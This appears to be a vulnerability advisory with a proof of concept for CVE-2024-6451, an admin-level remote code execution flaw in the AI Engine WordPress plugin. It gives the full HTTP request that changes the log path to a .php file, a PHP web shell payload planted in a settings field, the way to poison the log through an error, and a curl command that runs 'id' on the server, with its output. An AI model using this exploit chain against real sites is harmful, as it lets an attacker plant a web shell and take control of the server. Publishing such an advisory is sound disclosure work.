AI Engine < 2.5.1 – Admin+ RCE | CVE 2024-6451

Description

AI Engine < 2.4.3 is susceptible to remote-code-execution (RCE) via Log Poisoning. The plugin fails to validate the file extension of "logs_path", allowing Administrators to change log filetypes from .log to .php.

Error messages can then be manipulated to contain arbitrary PHP with the intent to have this echoed in the log file and ultimately executed as legitimate code by the web server, leading to the potential for remote-code-execution.

Proof of Concept

1. Navigate to AI Engine > Settings > Advanced > Enable Dev Tools (as Admin)

----------------------------------------------------------------------

2. Navigate to AI Engine > Dev Tools > Enable Server Debug

----------------------------------------------------------------------

3. Save settings and change the extension (and filename, optionally) of "logs_path" from .log to .php via the below request:

POST /wp-json/mwai/v1/settings/update HTTP/1.1
Host: 192.168.178.143
Content-Length: 17702
Pragma: no-cache
Cache-Control: no-cache
X-WP-Nonce: [NONCE]
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [Admin+ Cookie]
Connection: keep-alive

{
  "options": {
    "embeddings_default_env": "lohkmfon",
    "ai_default_env": "zl9pvc1h",
    "module_suggestions": true,
    "module_chatbots": true,
    "module_forms": false,
    "module_blocks": false,
    "module_playground": true,
    
    -- SNIP --
    
    },
    "public_api": true,
    "debug_mode": false,
    "server_debug_mode": true,
    "logs_path": "/opt/bitnami/wordpress/wp-content/uploads/webshell.php"
  }
}

----------------------------------------------------------------------

4. Insert payload <?php if(isset($_GET['cmd'])){system($_GET['cmd']);}?> into "Organization ID" input field (located at Settings > Environments for AI)

----------------------------------------------------------------------

5. Trigger the error so that the log file is poisoned with the PHP payload. This can be done unauthenticated by simply prompting the chatbot, or as admin by clicking Transcription > Transcribe Image. 

This should inject the log file with "2024-06-21 14:43:04: ❌ (OpenAI) No such organization: <?php if(isset($_GET['cmd'])){system($_GET['cmd']);}?>."

----------------------------------------------------------------------

6. Execute commands on the remote server via the poisoned log file:

--> Request: curl http://192.168.178.143/wp-content/uploads/webshell.php?cmd=id

--> Response: 2024-06-18 10:26:24: ❌ (OpenAI) No such organization: uid=1(daemon) gid=1(daemon) groups=1(daemon)